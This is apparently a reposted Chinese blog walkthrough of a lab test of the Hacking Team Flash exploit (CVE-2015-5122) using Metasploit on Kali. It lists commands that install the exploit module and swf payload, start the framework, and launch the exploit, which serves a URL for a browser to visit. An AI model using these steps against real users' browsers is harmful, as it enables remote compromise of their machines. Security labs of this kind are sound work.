Metasploit CVE-2015-5122 Flash漏洞利用检测试验

原文:http://www.freebuf.com/articles/system/75419.html

一次有趣的flash漏洞检测试验。


1、基础环境介绍。

本机win8专业版,VMware workstation 11, kali2.0镜像


2、环境初始化。

安装kali的虚拟机。这个不做讲解,可以看我的以前的文章,也可以随便网上搜一个。记得安装vmtools。方便上传文件。拖拽上传,有时候vsftp上传失败。


3、安装Metasploit

这个是kali自带的。不需要搞什么


4、下载漏洞检测需要的内容。

首先是 利用代码   改名字为  Adobe_Flash_HackingTeam_exploit.rb   后缀是   .rb

然后是  payload   

cp msf.swf  /usr/share/metasploit-framework/data/exploits/CVE-2015-5119/msf.swf   #把msf复制过去。

mkdir  /usr/share/metasploit-framework/modules/exploits/windows/flash/


cp  Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/

因为我是直接cd到了桌面 所以直接cp的。


5、开启工具

service postgresql start
service metasploit start  #如果这里出问题 可以搜索 metasploit 链接数据库失败之类的关键词。但是一般有什么提示都可以无视的。反正也看不懂。
msfconsole   #开启metasploit


6、开始工作

search hackingteam
use exploit/windows/flash/Adobe_Flash_HackingTeam_Exploit
show options
exploit

此时,给了一个url地址。

把这个地址输入你的本机的浏览器或者可以访问你的虚拟机的浏览器上。

然后虚拟机会给你一个地址让你去看。或者直接反馈回来一些信息。

就这样。

一个快捷的操作完成了。

详细视频演示可以观看原文。原文还有更详细的讲解。

以上内容为本人观看原文后亲自测试后的结果展示。。

你可能感兴趣的:(windows,虚拟机,上传文件,Flash,改名字)